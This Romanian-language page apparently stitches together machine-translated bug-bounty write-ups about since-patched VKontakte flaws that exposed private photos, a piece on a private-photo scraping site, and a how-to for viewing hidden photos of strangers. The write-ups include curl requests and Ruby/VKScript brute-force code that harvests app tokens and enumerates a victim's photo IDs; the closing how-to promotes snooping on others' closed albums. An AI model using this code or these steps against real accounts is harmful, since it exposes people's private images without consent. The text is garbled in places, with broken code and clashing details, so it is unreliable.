10 februarie 2016 la 15:23

Vulnerabilitatea VKontakte: acces la previzualizări ale fotografiilor din dialoguri și albume ascunse ale oricărui utilizator

Mic de statura

O vulnerabilitate a fost descoperită în versiunea mobilă a site-ului vk.com. Vă permitea să vizualizați previzualizări ale fotografiilor ascunse, inclusiv fotografii din conversațiile utilizatorilor, plus puteți obține informații despre utilizatorii cărora le-a plăcut această fotografie ascunsă. Momentan, vulnerabilitatea nu mai există - a fost remediată în urmă cu șase luni. VKontakte și-a exprimat recunoștința în valoare de 700 USD (nu, nu în voturi).

Cum a început totul

În timpul sesiunii, ești distras de tot, doar să nu te pregătești pentru examene. Așa că, când am văzut despre programul Bug Bounty de la VKontakte pe hackerone.com, în loc să mă pregătesc pentru examene, am început să caut vulnerabilități. Din anumite motive, am fost imediat atras să caut vulnerabilități asociate cu fotografiile și setările de confidențialitate ascunse și, după cum s-a dovedit, nu a fost în zadar.

Căutați vulnerabilități pe versiunea completă a site-ului

Presupunând că știam id-ul fotografiei ascunse (mai multe despre găsirea ei mai jos), am început să încerc să înlocuiesc acest id în tot felul de solicitări de curl - am încercat să salvez imagini ascunse în albumul meu, etichetându-mă în ele, apreciind, repostând, etc nimic nu a dat un rezultat pozitiv până când am încercat să trimit pur și simplu o fotografie ascunsă pe perete Rezultatul a fost ciudat - în consolă solicitarea a returnat rezultatul corect și a apărut o nouă postare pe perete, dar oricât m-am strădui. , totul a fost oprit pe server încercări de a trimite o fotografie ascunsă pe perete - postările erau goale.

Comutați la versiunea mobilă

Apoi, mi-am amintit acest comentariu și am decis să încerc să fac același lucru în versiunea mobilă a site-ului.

Trimiterea unei fotografii pe perete:

Curl „http://m.vk.com/wall53083705” -H „Cookie: remixsid=#remixsid” --data „act=post&hash=#hash&attach1_type=photo&attach1=idOwnerPhoto_idHiddenPhoto” # id-ul fotografiei este format din două părți separate printr-un caracter de subliniere idOwnerPhoto_idHiddenPhoto
Această solicitare nu a fost completată corect, dar după reîmprospătarea paginii, am fost surprins să constat că pe formularul de depunere a apărut o copie mică atașată a fotografiei.

Dimensiunea maximă a fotografiei este de 130x130, dar aceasta este suficientă, de exemplu, pentru a recunoaște fețele dintr-o fotografie. Încercările de a obține un link către fotografia completă nu au avut succes. Aparent, după ce această vulnerabilitate este închisă, linkurile directe către dimensiunea completă nu pot fi obținute cu ușurință din versiunea mobilă a site-ului.

Răsfoind fotografii

Vulnerabilitatea găsită. Pentru a exploata vulnerabilitatea găsită, trebuie să obțineți id-ul fotografiei atacate.

ID-ul foto este format din două părți: photo12345_330000000 (Owner_idPhoto), a doua parte crește de la o fotografie la alta, dar aceasta nu este o creștere automată obișnuită. Deoarece algoritmul de selecție a pașilor este necunoscut, vom repeta cu pasul 1.

Pentru a enumera vom folosi metoda api fotografii.delete. Pentru toate fotografiile existente (inclusiv cele ascunse), această metodă va reveni cod de eroare: 15. Și pentru toate actele de identitate cu fotografie inexistente, se va returna unul.

Viteza de căutare

Din acest articol puteți afla cum să sortați rapid fotografiile. Da, datele din el nu sunt cele mai noi, dar chiar dacă țineți cont de faptul că de-a lungul anului au fost de două ori mai multe fotografii, timpul de căutare rămâne totuși acceptabil.

pentru a afla legături directe către fotografiile unui utilizator, să zicem, de anul trecut, trebuie să sortați doar 30 de milioane (de la _320000000 la _350000000) diferite variante de link-uri

Folosind accelerațiile de căutare din articolul menționat, fotografiile utilizatorului ar putea fi căutate:

în 1 minut obțineți toate fotografiile de ieri, în 7 minute - toate fotografiile încărcate săptămâna trecută, în 20 de minute - luna trecută, în 2 ore - anul trecut.

Eliminarea deschis/ascuns

După ce ați primit link-uri către toate fotografiile (atât ascunse, cât și deschise) ale utilizatorului, le puteți selecta doar pe cele ascunse încercând să obțineți informații despre fotografie folosind metoda photos.getById. Acele fotografii pentru care informațiile nu sunt returnate prin această metodă sunt ascunse.

Informații despre utilizatorii apreciați

De asemenea, a fost posibil să recunoașteți utilizatorii cărora le-a plăcut fotografia ascunsă. Metoda likes.getList a returnat toți utilizatorii care au adăugat un anumit obiect la lista de aprecieri, chiar dacă acel obiect a fost ascuns utilizatorului care rulează această metodă.

Raportați la hackerone

Raportul meu a fost deschis în iunie. Au închis vulnerabilitatea după două luni și jumătate fără să-mi spună nimic. Încă o lună mai târziu, am primit un răspuns că vulnerabilitatea a fost confirmată și închisă. Și după ceva timp am primit o recompensă.

P.S.: pentru cei care încearcă să retragă recompense de pe hackerone.com într-un nou cont paypal pentru prima dată, vă sfătuiesc să citiți cu atenție termenii și condițiile. Paypal, la transferul de fonduri, poate, fără consimțământul dumneavoastră, să convertească recompensa în moneda țării specificate în profilul dumneavoastră.

Unii utilizatori refuză accesul la înregistrările, albumele, fotografiile, înregistrările audio și video ale acestora. Pentru a vizualiza fotografiile ascunse pe o pagină VK, trebuie să cunoașteți ID-ul acesteia.

Pentru a efectua orice acțiuni VK, inclusiv căutarea unui ID, conectați-vă folosind datele de conectare sau numărul de telefon și parola.

Pentru a vizualiza fotografii private, copiați ID-ul utilizatorului din bara de adrese a browserului dvs. Pentru a face acest lucru, deschideți pagina dorită și veți vedea numerele după cuvântul „id”:

Există situații în care nickname-ul utilizatorului este afișat în loc de id. În acest caz, pentru a afla ID-ul, trebuie să faceți clic pe orice postare de pe perete și să deschideți adresa linkului în browser. Identificatorul poate fi văzut între textul „perete” și liniuța de subliniere.

Dacă nu există postări pe perete, atunci puteți deschide avatarul persoanei și în browser găsiți identificatorul după cuvântul „fotografie”.

Există situații în care utilizatorul are acces complet limitat la datele sale în așa fel încât este imposibil chiar să mărească și să vizualizeze avatarul. Mai mult, în loc de id, există și o poreclă pe pagina lui. În acest caz, trebuie să apelați la codul HTML. Pentru a face acest lucru, faceți clic dreapta și selectați fila „Vizualizare codul paginii”.

Copiați numele de utilizator, începeți căutarea folosind combinația de taste „Ctrl+F” și inserați datele în câmpul corespunzător. Faceți clic pe OK. Browserul va afișa 1 și 2 potriviri. Dacă prima potrivire nu are un ID specificat, treceți la a doua.

Cum să vizualizați fotografiile unui utilizator cunoscând ID-ul

Cunoscând identificatorul, puteți vizualiza fotografii private, inclusiv cele în care persoana a fost etichetată de alți utilizatori. Pentru a face acest lucru, trebuie să faceți următoarele:

1. În bara de adrese a browserului, introduceți următorul text:

O colecție uriașă de fotografii private pe VK (aproximativ 100 de milioane). Serviciul colectează fotografii ale tuturor utilizatorilor rețelelor sociale. rețele într-un singur director.

Găsirea fotografiilor unui anumit utilizator este ușoară - trebuie doar să le introduceți. Dar este greu de eliminat, dacă le scrii creatorilor prin e-mail, atunci șansa este mică, dar dacă faci donații, șansa crește.

Cum colectează depozitul de vite fotografii pe VK? Este foarte simplu: serviciul încarcă automat fotografiile tuturor utilizatorilor online în colecție. Nu contează unde îți postezi fotografia, într-o comunitate sau profil. Chiar dacă fotografia este ștearsă după câteva minute, aceasta va fi deja în stația de vite.

Prin urmare, mulți utilizatori nemulțumiți au apelat la Roskomnadzor, care a contribuit la stația de vite a fost blocată pe teritoriul Federației Ruse. Nu este posibil să ocoliți blocarea.

Colectarea și stocarea datelor cu caracter personal ale utilizatorilor este interzisă. Deși utilizatorii înșiși postează fotografii în mod public.

Pentru acum site-ul nu functioneaza chiar și cu servere proxy. Proprietarii au abandonat afacerea imediat după blocare. Așa că poți dormi liniștit și să nu-ți fie teamă că cineva se va uita la fotografiile tale personale.

Analogii lui Skotobaza

În 2018 Au existat diferiți analogi, cum ar fi „Burn”, dar nu funcționează toate, deoarece dezvoltatorii VKontakte au modificat scripturi care interzic roboților să fure fotografii private.

Atenţie: Internetul este plin de „analogi” ale unei ferme de vite, dar nu numai că nu funcționează, dar provoacă și piratarea contului! Dacă întâlniți astfel de site-uri, sub nicio formă nu introduceți date de la VKontakte. Atacatorii vor avea acces la cont și vor putea.

Epoca fermelor de animale și a serviciilor similare a luat sfârșit. Acum este interzisă stocarea și distribuirea de fotografii intime, private. Dacă nu respectați legea, va urma pedeapsa.

tl;dr

A fost descoperită o vulnerabilitate în marcajele VK, care a făcut posibilă primirea de link-uri directe către fotografii private din mesaje personale și albume ale oricărui utilizator/grup. A fost scris un script care a sortat fotografiile utilizatorilor pentru o anumită perioadă și apoi, prin această vulnerabilitate, a primit link-uri directe către imagini. Pe scurt, puteți obține toate fotografiile de ieri în 1 minut, toate fotografiile încărcate săptămâna trecută în 7 minute, luna trecută în 20 de minute, anul trecut în 2 ore. Vulnerabilitatea a fost acum remediată. Administrația VKontakte a plătit o recompensă de 10.000 de voturi.

Povestea a început când mi-a fost trimisă o imagine într-un mesaj personal pe VKontakte. De obicei, dacă ceva este important, îl încarc în cloud, dar în cazul meu acest lucru nu a fost necesar și am decis să folosesc funcția de marcare VKontakte.

Pe scurt despre această funcționalitate: toate lucrurile pe care utilizatorul le-au plăcut sunt adăugate la marcaje; Există, de asemenea, o funcție pentru adăugarea manuală a unui link către un utilizator și a unui link intern VKontakte. Ultimul punct mi s-a părut foarte interesant, deoarece după ce am adăugat un link la fotografie, am văzut previzualizarea și textul acesteia cu tipul de entitate adăugată:

Când se adaugă un link, serverul îl analizează, încearcă să afle la ce entitate se referă și preia informații despre acest obiect din baza de date. De obicei, atunci când scrieți acest tip de funcție cu multe condiții, probabilitatea ca dezvoltatorul să uite ceva este foarte mare. Așa că nu mi-am putut permite să renunț și am decis să îmi iau câteva minute pentru a experimenta puțin.

Drept urmare, am reușit să găsesc ceva. Adăugând un link către o fotografie, o notă sau un videoclip care nu este accesibil, puteți obține câteva informații private despre obiect. În cazul fotografiilor și videoclipurilor, aceasta este o mică previzualizare (150x150), pe care este destul de greu să vedeți ceva titlul pentru note private; Prin metoda API fave.getLinks Era posibil să obțineți linkuri către imagine, dar din nou dimensiunea a fost prea mică (75px și 130px). Deci, practic, nimic grav.

Am decis să merg la versiunea mobilă a site-ului pentru a verifica dacă totul era afișat acolo la fel ca în versiunea obișnuită. Privind codul paginii, am văzut asta:

Da! În valoarea atributului data-src_big a existat un link direct la imaginea originală!

Astfel, a fost posibil să obțineți un link direct către orice imagine de pe VKontakte, indiferent de locul în care a fost încărcată și de ce setări de confidențialitate avea. Aceasta poate fi o imagine din mesaje personale sau o fotografie din albumele private ale oricărui utilizator/grup.

S-ar părea că aș putea să mă opresc aici și să scriu dezvoltatorilor, dar m-am întrebat dacă este posibil, prin exploatarea acestei vulnerabilități, să obțin acces la toate (sau descărcate într-o anumită perioadă de timp) fotografiile utilizatorului. Problema principală aici, după cum înțelegeți, a fost că linkul către o fotografie privată a formularului nu este întotdeauna cunoscut fotografiaXXXXXX_XXXXXXXXX pentru a adăuga la marcajele dvs. Mi-a venit în minte gândul de a căuta prin id-ul fotografiei, dar din anumite motive am respins-o imediat ca nebunească. Am verificat metodele legate de fotografii în API, m-am uitat la modul în care aplicația funcționează cu albume, dar nu am găsit scurgeri care să mă ajute să obțin o listă cu ID-urile tuturor fotografiilor private ale utilizatorului. Eram pe cale să renunț la această idee, dar uitându-mă din nou la link-ul cu fotografia, mi-am dat seama dintr-o dată că trecerea peste bord era o idee bună.

Cum funcționează fotografiile în VK

Cum ai putea înlocui, link către fotografie foto52708106_359542386 constă din două părți: (ID utilizator)_(un număr ciudat). Cum se formează a doua parte?

Din păcate, după ce am petrecut două ore experimentând, încă nu am înțeles asta. În 2012, la HighLoad++, Oleg Illarionov a spus câteva cuvinte despre cum stochează fotografiile, despre fragmentarea orizontală și selectarea aleatorie a unui server pentru încărcare, dar aceste informații nu mi-au dat nimic, deoarece nu există nicio legătură între id-ul serverului și ID foto. Este clar că există un fel de contor global, dar există o altă logică acolo... Pentru că dacă al doilea număr s-ar fi format folosind o incrementare automată obișnuită, atunci valorile ID-urilor cu fotografii ar fi atins cu mult timp în urmă valori uriașe. (pentru Facebook, de exemplu, în acest moment este de ~ 700 de trilioane), dar pentru Vkontakte această valoare este de numai ~ 400 de milioane (deși, judecând după statistici, zilnic utilizatorii încarcă peste 30 de milioane de fotografii). Acestea. Este clar că această cifră nu este unică, dar în același timp nu este întâmplătoare. Am scris un scenariu care a trecut prin fotografiile utilizatorilor „vechi” și, folosind datele primite, am făcut un grafic cu cât de mult s-a schimbat această cifră cu fiecare an:

Se poate observa că valorile fluctuează în funcție de unii factori (număr de servere sau logică nouă?). Dar ideea este că sunt suficient de mici (mai ales în ultimii 2-3 ani) și este foarte ușor de calculat intervalul de id-uri pentru perioada de timp dorită. Adică, pentru a afla legături directe către fotografiile unui utilizator, să zicem, de anul trecut, trebuie să încercați să marcați doar 30 de milioane (de la _320000000 la _350000000) diferite variante de link-uri! Mai jos am descris o tehnică de forță brută care mi-a permis să fac asta în câteva minute.

Trecând prin fotografii

Puteți adăuga toate acestea manual prin interfață sau puteți scrie un script care adaugă un link la marcaje, dar asta ar fi plictisitor și consuma mult timp. Viteza de căutare în acest caz ar fi de 3 marcaje pe secundă, deoarece trimite mai mult de trei solicitări pe secundă către serverul Vkontakte este interzis.

Accelerează căutarea x25

Pentru a ocoli măcar puțin limita de 3 cereri, am decis să folosesc metoda a executa. Într-un apel la această metodă, sunt posibile 25 de apeluri la metode API.

Var start = parseInt(Args.start); var end = parseInt(Args.end); var victimId = Args.id; var link = "http://vk.com/photo" + victimId + "_"; while(start != end) ( API.fave.addLink(( "link": link + start )); start = start + 1; );
Astfel, a fost posibilă creșterea vitezei de forță brută la 3*25 marcaje/sec. În ultimul an, ar fi durat mult să sortăm fotografiile, dar pentru perioade scurte această metodă de sortare era deja destul de bună.

Accelerează căutarea x25 * numărul de solicitări paralele pe secundă

Limita numărului de solicitări/sec se aplică fiecărei aplicații separat, și nu întregului utilizator. Deci nimic nu te împiedică să trimiți multe solicitări în paralel, dar în același timp să folosești token-uri din diferite aplicații.

Mai întâi trebuia să găsim (sau să creăm) numărul necesar de aplicații. A fost scris un script care caută aplicații autonome într-o gamă dată de identificatori de aplicație:

Class StandaloneAppsFinder attr_reader:app_ids def initialize(params) @range = params[:in_range] @app_ids = final def search (@range).each do |app_id| răspuns = deschis("https://api.vk.com/method/apps.get?app_id=#(app_id)").read app = JSON.parse(response)["response"] app_ids<< app_id if standalone?(app) end end private def standalone?(app_data) app_data["type"] == "standalone" end end
De asemenea, a fost posibilă selectarea aplicațiilor după numărul de utilizatori pentru a accelera și mai mult căutarea:

Dar am decis să nu mă deranjez cu asta.

Ok, aplicațiile au fost găsite, acum trebuie să dea permisiunea datelor utilizatorului nostru și să primească jetoane. Pentru autorizare a trebuit să folosim mecanismul Implicit Flow. A trebuit să analizez adresa URL de autorizare din dialogul OAuth și să scot jetonul după redirecționare. Această clasă necesită module cookie pentru a funcționa. p,l(login.vk.com) și remixsid(vk.com):

Class Authenticator attr_reader:access_tokens def initialize(cookie_header) @cookies = ( „Cookie” => cookie_header ) @access_tokens = end def authorize_apps(aplicații) apps.each do |app_id| auth_url = extract_auth_url_from(oauth_page(app_id)) redirect_url = open(auth_url, @cookies).base_uri.to_s access_tokens<< extract_token_from(redirect_url) end end private def extract_auth_url_from(oauth_page_html) Nokogiri::HTML(oauth_page_html).css("form").attr("action").value end def extract_token_from(url) URI(url).fragment end def oauth_page(app_id) open(oauth_page_url(app_id), @cookies).read end def oauth_page_url(app_id) "https://oauth.vk.com/authorize?" + "client_id=#{app_id}&" + "response_type=token&" + "display=mobile&" + "scope=474367" end end
Cu cât se găsesc multe aplicații, se fac atâtea cereri paralele. Pentru a paralela acest lucru, s-a decis să se folosească bijuteria Typhoeus, care s-a dovedit excelentă în alte sarcini. Rezultatul este un mic brute forcer ca acesta:

Clasa PhotosBruteforcer PHOTOS_ID_BY_PERIOD = ( "azi" => 366300000..366500000, "ieri" => 366050000..366300000, "luna_actuală" => 365000000..366500000..000.00.000..366300000, "curente" => 365000000 ..365000000, „an_actual” = > 350000000..366500000, "last_year" => 320000000..350000000 ) def initialize(params) @victim_id = params[:victim_id] @period = PHOTOS_ID_BY_PERIOD =(token dez = 0 (@period).step(25) do |photo_id| url = "https://api.vk.com/method/execute?access_token=#(tokens)&code=#(vkscript(photo_id))" encoded_url = URI.escape(url).gsub("+", "% 2B").delete("\n") tokensIterator = tokensIterator == tokens.count - 1 ? 0: tokensIterator + 1 hydra.queue Typhoeus::Request.new encoded_url hydra.run if tokensIterator.zero? terminați hydra.run, cu excepția cazului în care hydra.queued_requests.count.zero? end private def vkscript(photo_id)<<-VKScript var start = #{photo_id}; var end = #{photo_id + 25}; var link = "http://vk.com/photo#{@victim_id}" + "_"; while(start != end) { API.fave.addLink({ "link": link + start }); start = start + 1; }; return start; VKScript end end
Pentru a accelera și mai mult forța brută, a existat o încercare de a scăpa de corpul inutil din răspuns, dar CAP Solicitarea serverului VKontakte returnează o eroare 501 Neimplementat.

Versiunea finală a scriptului arată astfel:

Necesită „nokogiri” necesită „open-uri” necesită „typhoeus” necesită „json” necesită „./standalone_apps_finder” necesită „./photos_bruteforcer” necesită „./authenticator” bruteforcer = PhotosBruteforcer.new(victim_id: ARGV, punct: ARGV) apps_finder = StandaloneAppsFinder.new(in_range: 4800000..4800500) apps_finder.search # p,l - cookie-uri de la login.vk.com # remixsid - cookie from vk.com authenticator = Authenticator.new("p=;" + "l =;" + "remixsid=;") authenticator.authorize_apps(apps_finder.app_ids) bruteforcer.run(authenticator.access_tokens)
După rularea programului, marcajele conțineau toate fotografiile utilizatorului pentru o anumită perioadă. Tot ce a mai rămas a fost să mergeți la versiunea mobilă a VKontakte, să deschideți consola browserului, să scoateți linkuri directe și să vă bucurați de fotografiile în dimensiunea lor originală.

Rezultate

În general, totul depinde de conexiunea dvs. la internet și de viteza serverelor proxy, de latența serverelor Vkontakte, de puterea procesorului și de mulți alți factori. După ce am încercat scriptul de mai sus pe contul meu, am primit următoarele numere (fără a lua în considerare timpul petrecut primind jetoane):

Tabelul arată timpul mediu necesar pentru a încerca documentele de identitate cu fotografie într-o anumită perioadă. Sunt sigur că toate acestea ar fi putut fi accelerate de 10-20 de ori. De exemplu, într-un script de forță brută, faceți o coadă mare de toate cererile și sincronizarea normală între ele, deoarece în implementarea mea, o solicitare cu un timeout va încetini întregul proces. Și, în general, puteți cumpăra doar câteva exemple de pe EC2 și puteți obține toate fotografiile oricărui utilizator într-o oră. Dar deja voiam să dorm.

Și, în general, nu contează cât timp petrece atacatorul pentru asta, 5 ore sau întreaga zi, pentru că într-un fel sau altul va primi link-uri către imagini private. Capacitatea de a obține acces în siguranță la informații private într-un interval de timp limitat este principala amenințare pe care o reprezintă această vulnerabilitate.

Raportarea unei vulnerabilități

La început, raportul a fost trimis serviciului de asistență, dar după un răspuns de genul „mulțumesc, probabil că o vom remedia cumva...” și o săptămână de așteptare, m-am simțit oarecum trist. Mulțumiri lui Bo0oM, care a ajutat să contacteze direct dezvoltatorii. După aceea, erorile au fost închise în câteva ore, iar câteva zile mai târziu, administrația a transferat o recompensă în valoare de 10k în contul meu.

În procesul de explorare a posibilităților și pur și simplu folosind paginile rețelei sociale moderne VKontakte, utilizatorii au un număr mare de întrebări. Una dintre cele mai comune este soluția la problema cum să vizualizați fotografiile ascunse pe VKontakte. Destul de des, utilizatorii își ascund profilurile complet sau parțial, așa că nu este posibil să-și vizualizeze fotografiile.

Înainte de a lua în considerare problema capacității de a vizualiza fotografii ascunse, merită să luați în considerare pe scurt subiectul ascunderii lor. Pentru a vă ascunde fotografiile, va trebui să urmați acești pași:

• Trebuie să mergeți la pagina VK;
• În stânga, găsiți linia „Setările mele” și activați-o;
• Deschideți subsecțiunea „Confidențialitate”;
• Vor apărea setări speciale de confidențialitate. Ele pot fi instalate la discreția dvs.

Puteți ascunde nu numai fotografii, ci și înregistrări audio, postări și prieteni. După ce ați selectat linia care reflectă cine poate vedea fotografia, trebuie să determinați cui va fi permis să vadă fotografiile personale. Aici puteți alege confidențialitate completă setând-o la „numai eu” sau permițând vizionarea numai pentru prieteni. Funcțiile instalate încep să funcționeze imediat după ce au fost efectuate setările.

Cum să vizualizați fotografiile salvate în VK dacă sunt ascunse?

Deci, cum să vedeți fotografiile ascunse ale utilizatorilor VK? Nu există o schemă oficială de acțiune aici, deoarece dezvoltatorii rețelei de socializare respectă dorința utilizatorilor de a-și păstra confidențialitatea. Dacă doriți să vizualizați fotografii VK ascunse, ar trebui să urmați acești pași:

1. Trebuie să accesați profilul utilizatorului a cărui fotografie doriți să o vedeți.
2. Faceți clic pe un spațiu gol cu ​​un buton obișnuit al mouse-ului.
3. Selectați secțiunea „Vizualizare codul sursă a paginii”.
4. Apăsați Ctrl+F.
5. În căutare, introduceți „albume”, doar fără ghilimele.
6. Numerele apar în rând după acest cuvânt; Acesta este codul paginii.
7. Trebuie să accesați din nou profilul utilizatorului și să introduceți „?z=albums” în bara de adrese după ID, tot fără ghilimele.
8. Fragmentul copiat anterior este lipit.
9. Apăsați Enter și bucurați-vă să vedeți fotografii ascunse.

Important! Această opțiune de a vizualiza fotografii private dacă accesul este închis nu este în întregime legală, administrația VK nu o aprobă.

Din acest motiv, nu ar trebui să fii surprins dacă abilitatea de a vizualiza fotografiile salvate dacă sunt ascunse este închisă.

Site pentru vizualizarea fotografiilor ascunse pe VKontakte

Această metodă poate fi utilizată în cazul unui fragment de cod deja primit, care poate fi obținut folosind metoda descrisă mai sus. Pentru a vizualiza fotografiile ascunse, trebuie să reveniți la pagina dorită, pe site-ul de socializare din bara de căutare a browserului, să introduceți un link organizat după tip - vk.com/id...., unde după ID există o pagină numar de identificare. Apoi, plasați cursorul chiar la sfârșitul adresei și introduceți imediat caracterele speciale „?z=”.

Ca urmare a unor astfel de acțiuni, în linia browserului de lucru va apărea următorul mesaj: vk.com/id......?z=albums....., unde punctele de suspensie sunt ID-ul utilizatorului. După ce apăsați Enter, toate fotografiile persoanei de interes se vor deschide automat în atenția dumneavoastră.

Concluzie

Cu metodele destul de simple prezentate atenției dumneavoastră, puteți studia fotografiile utilizatorilor în albume închise fără probleme. Principalul avantaj al unor astfel de tehnici este capacitatea de a vedea fotografii în albumele acelor oameni care nu mai sunt prieteni pe VK și străini completi.